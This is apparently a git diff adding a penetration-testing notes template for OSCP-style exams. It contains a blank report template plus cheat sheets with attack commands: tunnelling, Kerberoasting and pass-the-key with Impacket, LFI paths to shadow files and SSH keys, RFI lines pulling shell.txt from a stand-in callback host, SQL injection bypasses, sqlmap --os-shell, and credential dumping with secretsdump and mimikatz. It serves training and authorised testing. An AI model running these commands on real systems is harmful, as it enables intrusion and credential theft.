+The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal exam systems – the THINC.local domain.
+My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
+
+When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network.
+When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.
+During the testing, I had administrative level access to multiple systems.
+All systems were successfully exploited and access granted.
+These systems as well as a brief description on how access was obtained are listed below:
+
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - BOF
+
+## Recommendations
+
+I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future.
+One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
+
+<div style="page-break-after: always;"></div>
+
+# Methodologies
+
+I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Exam environments is secured.
+Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
+
+## Information Gathering
+
+The information gathering portion of a penetration test focuses on identifying the scope of the penetration test.
+During this penetration test, I was tasked with exploiting the exam network.
+The specific IP addresses were:
+
+**Exam Network**
+
+- 192.168.
+- 192.168.
+- 192.168.
+- 192.168.
+- 192.168.
+
+## Penetration
+
+The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
+During this penetration test, I was able to successfully gain access to **X** out of the **X** systems.
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.
+This is valuable for an attacker as it provides detailed information on potential attack vectors into a system.
+Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.
+In some cases, some ports may not be listed.
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+**Vulnerability Exploited: **
+
+**Proof Screenshot:**
+
+<div style="page-break-after: always;"></div>
+
+## Maintaining Access
+
+Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable.
+The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again.
+Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
+
+## House Cleaning
+
+The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.
+Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.
+Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
+
+After collecting trophies from the exam network was completed, Alec removed all user accounts and passwords as well as the Meterpreter services installed on the system.
+Offensive Security should not have to remove any user accounts or services from the system.
+
+<div style="page-break-after: always;"></div>
+
+
+# Additional Items
+
+## Appendix - Proof and Local Contents:
+
+IP (Hostname) | Local.txt Contents | Proof.txt Contents
+--------------|--------------------|-------------------
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+
+## Appendix - Metasploit/Meterpreter Usage
+
+For the exam, I used my Metasploit/Meterpreter allowance on the following machine: `192.168.x.x`
+
+<br>
+
+<center>
+
+![310x310.png](../../_resources/310x310.png) 
+
+</center>
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/Tips for Writing a Report.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/Tips for Writing a Report.md
new file mode 100644
index 0000000..0fa6735
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/Tips for Writing a Report.md	
@@ -0,0 +1,18 @@
+1. Understand who is going to be reading this and who is the target audience?
+2. The report needs to clear that a non-technical person would understand 
+3. Report should include the following: 
+	1. Executive Summary
+	2. Technical Summary
+	3. Detail Report of findings
+	4. Recommendations for remediation (If possible)
+
+
+
+Resources:
+
+- https://blog.zsec.uk/ltr101-pentest-reporting/
+- https://github.com/juliocesarfort/public-pentesting-reports
+
+Public Pentesting Reports: 
+
+- https://github.com/juliocesarfort/public-pentesting-reports
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/General Information.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/General Information.md
new file mode 100644
index 0000000..48f37e8
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/General Information.md	
@@ -0,0 +1,9 @@
+Created by TJ Null:
+
+Twitter: https://twitter.com/TJ_Null
+Github: https://github.com/tjnull
+
+Contribution: 
+
+If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here:
+- https://github.com/tjnull/TJ-JPT
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/Pivoting_Tunneling.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/Pivoting_Tunneling.md
new file mode 100644
index 0000000..db90dbe
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/Pivoting_Tunneling.md	
@@ -0,0 +1,94 @@
+# SSH Tunneling
+
+
+Note: Target must have SSH running for there service
+
+1. Create SSH Tunnel: ssh -D localhost:<local port> -f -N user@localhost -p <Target Port>
+2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
+3. Add the following line into the config: Socks5 127.0.0.1 <Local Port>
+4. Run commands through the tunnel: proxychains <command>
+
+## SShuttle
+
+In Kali
+
+Source: https://github.com/sshuttle/sshuttle
+
+- sshuttle -r root@172.21.0.0 10.2.2.0/24
+
+
+# Meterpreter
+
+Use only if you have a meterpreter shell and you need to pivot to another network.
+
+## Portfwd
+
+- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80
+
+## Autoroute
+In Metasploit
+1. use post/multi/manage/autoroute
+```
+msf5 post(multi/manage/autoroute) > options
+
+Module options (post/multi/manage/autoroute):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
+   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
+   SESSION                   yes       The session to run this module on.
+   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)
+
+msf5 post(multi/manage/autoroute) > 
+```
+2. set session <avaliable session>
+3. run  
+
+## Metasploit Socks Proxy
+
+   1  auxiliary/server/socks4a                                  normal  No     Socks4a Proxy Server
+   2  auxiliary/server/socks5                                   normal  No     Socks5 Proxy Server
+   3  auxiliary/server/socks_unc                                normal  No     SOCKS Proxy UNC Path Redirection
+
+# Ncat
+
+## Http Proxy
+- ncat -vv --listen 3128 --proxy-type http
+
+## Port Forwarder
+1. mknod pivot p
+2. nc -l -p < port to listen on> 0<pivot | nc <target> <pivot-port> 1>pivot
+
+# Cntlm
+
+apt install cntlm
+
+1. cntlm -u username@breakme.local -I proxy
+2. export http://127.0.0.1:3128, export https://127.0.0.1:3128
+3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128"
+
+# netsh port forwarding
+- netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
+- netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000
+
+
+# Proxy Binaries for Windows
+Windows 10 has SSH (Thanks WSL!)
+plink.exe (In Kali)
+
+# Other Tools:
+- ssf: https://github.com/securesocketfunneling/ssf
+- rpivot: https://github.com/klsecservices/rpivot
+- hans (ICMP Tunneling): http://code.gerade.org/hans/
+- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/
+- Dnscat2: https://github.com/iagox86/dnscat2
+- Chisel: https://github.com/jpillora/chisel
+- httptunnel: In Kali apt install httptunnel
+
+# Other Resources:
+
+- https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
+- https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
+- 
+
diff --git a/Pentest_Template_Master_1.0/_resources/310x310.png b/Pentest_Template_Master_1.0/_resources/310x310.png
new file mode 100755
index 0000000..7ebd5b4
Binary files /dev/null and b/Pentest_Template_Master_1.0/_resources/310x310.png differ
diff --git a/Pentest_Template_Master_1.0/_resources/d2550626a1c94aeebd273d43be0669c9.png b/Pentest_Template_Master_1.0/_resources/d2550626a1c94aeebd273d43be0669c9.png
new file mode 100644
index 0000000..fa27c6c
Binary files /dev/null and b/Pentest_Template_Master_1.0/_resources/d2550626a1c94aeebd273d43be0669c9.png differ
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/General Notes.md
new file mode 100644
index 0000000..655afdb
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/General Notes.md	
@@ -0,0 +1,113 @@
+# "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to"
+
+
+## tcpdump:
+
+- tcpdump -i eth0
+- tcpdump -c -i eth0
+- tcpdump -A -i eth0
+- tcpdump -w 0001.pcap -i eth0
+- tcpdump -r 0001.pcap
+- tcpdump -n -i eth0
+- tcpdump -i eth0 port 22
+- tcpdump -i eth0 -src 172.21.10.X
+- tcpdump -i eth0 -dst 172.21.10.X
+
+Other tools: 
+
+Tshark (Command Line Wireshark)
+Wireshark
+
+
+## Network Scanning
+
+NetDiscover (ARP Scanning):
+- netdiscover -i eth0
+- netdiscover -r 172.21.10.0/24
+
+Nmap:
+
+- nmap -sn 172.21.10.0/24
+- nmap -sn 172.21.10.1-253
+- nmap -sn 172.21.10.*
+
+Nbtscan: 
+- nbtscan -r 172.21.1.0/24
+
+Linux Ping Sweep (Bash)
+
+- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done
+
+Windows Ping Sweep (Run on Windows System)
+
+- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 172.21.1.%i is up.
+
+
+
+## Host Scanning
+
+Nmap:
+
+- nmap -sC -sV 172.21.0.0
+- nmap -Pn -sC -sV -p- 172.21.0.0
+- nmap -sV -Pn 172.21.0.0
+- nmap -T4 -sC -sV 172.21.0.0
+- nmap -A 172.21.0.0
+
+Nmap Stealth: 
+- nmap -sS -sC -sV 172.21.0.0
+- nmap -sS -p- 172.21.0.0
+
+
+UDP Scan: 
+- nmap -sS -sU -Pn -sV 172.21.0.0
+- nmap -sU -A --top-ports=20 --version-all
+- nmap -sU -A -p 53,67,68,161,162 --version-all 
+- unicornscan -mU -p ,161,162,137,123,138,1434,445,135,67,68,53,139,500,637,162,69
+
+
+IPv6 Scan:
+
+Nmap Scripts: 
+
+Location: /usr/share/nmap/scripts/
+
+- nmap --scripts vuln,safe,discovery -oN results.txt target-ip
+
+Scans through Socks proxy: 
+
+- nmap --proxies socks4://proxy-ip:8080 target-ip
+
+DNSRecon: 
+
+- dnsrecon -d www.example.com -a 
+- dnsrecon -d www.example.com -t axfr
+- dnsrecon -d <startIP-endIP>
+- dnsrecon -d www.example.com -D <namelist> -t brt
+
+Dig: 
+
+- dig www.example.com + short
+- dig www.example.com MX
+- dig www.example.com NS
+- dig www.example.com> SOA
+- dig www.example.com ANY +noall +answer
+- dig -x www.example.com
+- dig -4 www.example.com (For IPv4)
+- dig -6 www.example.com (For IPv6)
+- dig www.example.com mx +noall +answer example.com ns +noall +answer
+- dig -t AXFR www.example.com
+
+Sublis3r:
+
+- Sublist3r -d www.example.com
+- Sublist3r -v -d www.example.com -p 80,443
+
+OWASP AMASS: 
+
+- amass enum -d www.example.com
+- amass intel -whois -d www.example.com
+- amass intel -active 172.21.0.0-64 -p 80,443,8080,8443
+- amass intel -ipv4 -whois -d www.example.com
+- amass intel -ipv6 -whois -d www.example.com
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/Target _1.md
new file mode 100644
index 0000000..9aaf438
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/Target _1.md	
@@ -0,0 +1,6 @@
+# Fill in results or other information about your target here: 
+
+
+
+
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/General Notes.md
new file mode 100644
index 0000000..dbbfa7c
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/General Notes.md	
@@ -0,0 +1,7 @@
+# When in Doubt...Always Enumerate! Enumeration is the key!
+
+
+
+## Resources
+- http://www.0daysecurity.com/penetration-testing/enumeration.html
+- Backup Link: https://web.archive.org/web/20201122081447/http://www.0daysecurity.com/penetration-testing/enumeration.html
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket General Notes.md
new file mode 100644
index 0000000..cdcb8b7
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket General Notes.md	
@@ -0,0 +1,12 @@
+## In Kali
+
+apt install impacket-scripts
+
+## Github
+
+https://github.com/SecureAuthCorp/impacket
+
+## Local Locations:
+
+/usr/share/doc/python3-impacket/examples
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket Kerberoasting.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket Kerberoasting.md
new file mode 100644
index 0000000..f12888f
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket Kerberoasting.md	
@@ -0,0 +1,24 @@
+## Check for Kerberoasting: 
+
+- GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john
+
+## GetUserSPNs
+
+ASREPRoast:
+- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
+- impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
+
+Kerberoasting: 
+- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> 
+
+Overpass The Hash/Pass The Key (PTK):
+- python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
+- python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
+- python3 getTGT.py <domain_name>/<user_name>:[password]
+
+## Using TGT key to excute remote commands from the following impacket scripts:
+
+- python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+- python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+- python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Responder.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Responder.md
new file mode 100644
index 0000000..48c6d82
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Responder.md	
@@ -0,0 +1,23 @@
+Cannot use in the OSCP Exam. Fun to use on assessments.
+Note: Multirelay.py does not work in python3 since the UserDict library has been depricated
+
+
+# Source: https://github.com/lgandx/Responder
+
+## Make changes to config to turn off services:
+
+nano /usr/share/responder/Responder.conf
+
+## Starting Responder:
+
+- responder -I [Interface] -A
+- responder -I [Interface] -i [IP Address] or -e [External IP] -A
+
+## Tools in Responder: 
+
+Location: /usr/share/Responder/tools
+
+## Check for systems with SMB Signing not enabled
+
+- python3 RunFinger.py -i 172.21.0.0/24
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Changelog.txt/Changelog.txt Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Changelog.txt/Changelog.txt Notes.md
new file mode 100644
index 0000000..e69de29
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/General Notes.md
new file mode 100644
index 0000000..d9b562a
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/General Notes.md	
@@ -0,0 +1,126 @@
+
+## Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!
+
+## 
+
+## Common Wordlists to use for Web App Scanning: 
+
+Common Wordlists to use for Web Directory Scanning: 
+- /usr/share/wordlists/dirb/common.txt
+- /usr/share/wordlists/dirbuster/*.txt
+- /usr/share/wordlists/wfuzz/general/*.txt
+- /usr/share/seclists/Discovery/Web-Content/
+
+Common Wordlists to use for User Enumeration Scanning: 
+- /usr/share/seclists/Usernames
+- /usr/share/wordlists/dirbuster/apache-user-enum-2.0
+
+## Web App Scanners
+
+Nikto: 
+
+- nikto --url <domain>
+
+Wpscan:
+
+- wpscan --url <domain>
+- wpscan --url <domain> --enumerate ap at (All Plugins, All Themes)
+- wpscan --url <domain> --enumerate u (Usernames)
+- wpscan --url <domain> --enumerate v
+
+Web Tools for Directory Scanning: 
+
+
+
+Dirb: 
+
+- dirb <domain>
+- dirb <domain> <wordlist>
+
+Gobuster: 
+
+- gobuster dir -u <url> -w /usr/share/wordlists/<Wordlist file>
+- gobuster dir -u <url> -w /usr/share/wordlists/<Wordlist file> -a Firefox (Custom Agent)
+- gobuster dir -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html
+- gobuster dir -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster dir -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster dir -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster dir -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" -o output.txt
+- gobuster dir -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
+
+Wfuzz:
+
+- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
+- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
+- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ"  --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)
+
+- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)
+
+Dirsearch: 
+
+- dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php
+
+FFuF:
+
+- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0
+- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -b "COOKIE VALUE; security=low" -u http://172.21.0.0
+- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -fc 403, 302, 200
+- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -H "Host: 172.21.0.0" -u http://172.21.0.0
+- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -timeout 5
+
+
+Other Tools: 
+- Burp Suite
+- OWASP Zap
+- Cadaver
+- SQLMap
+- Joomscan
+- Feroxbuster
+
+
+## Testing for LFI: 
+
+https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf
+
+Examples: 
+
+http://example.com/index.php?page=etc/passwd
+http://example.com/index.php?page=etc/passwd%00
+http://example.com/index.php?page=../../etc/passwd
+http://example.com/index.php?page=%252e%252e%252f
+http://example.com/index.php?page=....//....//etc/passwd
+
+Interesting Files:
+
+Linux:
+/etc/passwd
+/etc/shadow
+/etc/issue
+/etc/group
+/etc/hostname
+/etc/ssh/ssh_config
+/etc/ssh/sshd_config
+/root/.ssh/id_rsa
+/root/.ssh/authorized_keys
+/home/user/.ssh/authorized_keys
+/home/user/.ssh/id_rsa
+
+Windows:
+
+Windows:
+/boot.ini
+/autoexec.bat
+/windows/system32/drivers/etc/hosts
+/windows/repair/SAM
+
+
+
+## Testing for RFI: 
+
+http://example.com/index.php?page=http://callback.com/shell.txt
+http://example.com/index.php?page=http://callback.com/shell.txt%00
+http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt
+
+## Resources
+
+- Turning LFI to RFI: https://l.avala.mp/?p=241
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/SQL Injection.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/SQL Injection.md
new file mode 100644
index 0000000..cc7d1db
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/SQL Injection.md	
@@ -0,0 +1,25 @@
+Testing for Bypasses: 
+
+' or 1=1 LIMIT 1 --
+' or 1=1 LIMIT 1 -- -
+' or 1=1 LIMIT 1#
+'or 1#
+' or 1=1 --
+' or 1=1 -- -
+
+# SQLMAP
+
+## sqlmap crawl  
+sqlmap -u http://172.21.0.0 --crawl=1
+
+## sqlmap dump database  
+sqlmap -u http://172.21.0.0 --dbms=mysql --dump
+
+## sqlmap shell  
+sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell
+
+# SQLI
+
+Testing for a row: 
+
+- http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/General Notes.md
new file mode 100644
index 0000000..ffc452e
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/General Notes.md	
@@ -0,0 +1,63 @@
+
+## Enumerate SMB:
+
+Enum4linux:
+
+- Enum4linux -a 172.21.0.0
+
+SMBmap:
+
+- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
+- smbmap -H 172.21.0.0 -d [domain] -u "" -p ""
+
+Nmap: 
+
+- nmap --script smb-* -p 139,445, 172.21.0.0
+- nmap --script smb-enum-* -p 139,445, 172.21.0.0
+
+/usr/share/nmap/scripts/smb-brute.nse
+/usr/share/nmap/scripts/smb-enum-domains.nse
+/usr/share/nmap/scripts/smb-enum-groups.nse
+/usr/share/nmap/scripts/smb-enum-processes.nse
+/usr/share/nmap/scripts/smb-enum-services.nse
+/usr/share/nmap/scripts/smb-enum-sessions.nse
+/usr/share/nmap/scripts/smb-enum-shares.nse
+/usr/share/nmap/scripts/smb-enum-users.nse
+/usr/share/nmap/scripts/smb-flood.nse
+/usr/share/nmap/scripts/smb-ls.nse
+/usr/share/nmap/scripts/smb-mbenum.nse
+/usr/share/nmap/scripts/smb-os-discovery.nse
+/usr/share/nmap/scripts/smb-print-text.nse
+/usr/share/nmap/scripts/smb-protocols.nse
+/usr/share/nmap/scripts/smb-psexec.nse
+/usr/share/nmap/scripts/smb-security-mode.nse
+/usr/share/nmap/scripts/smb-server-stats.nse
+/usr/share/nmap/scripts/smb-system-info.nse
+
+
+SMBClient: 
+
+- smbclient -L 172.21.0.0
+- smbclient //172.21.0.0/tmp
+
+Impacket SmbClient: 
+
+- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0
+
+RPCclient: 
+
+- rpcclient -U "" -N 172.21.0.0 enumdomusers
+
+Impacket: 
+
+- python3 samdump.py SMB 172.21.0.0
+
+CrackMapExec: 
+
+- crackmapexec smb -L 
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share
+- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz
+
+ 
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md
new file mode 100644
index 0000000..a482896
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md	
@@ -0,0 +1,33 @@
+# Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 
+
+
+Anonymous Credential LDAP Dumping: 
+
+- ldapsearch -LLL -x -H ldap://<domain fqdn> -b ‘’ -s base ‘(objectclass=*)’
+
+Impacket GetADUsers.py (Must have valid credentials)
+
+- GetADUsers.py -all <domain\User> -dc-ip <DC_IP>
+
+Impacket lookupsid.py:
+
+- /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0
+
+Impacket Secretdump:
+
+python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin
+
+Windapsearch:
+
+https://github.com/ropnop/windapsearch 
+
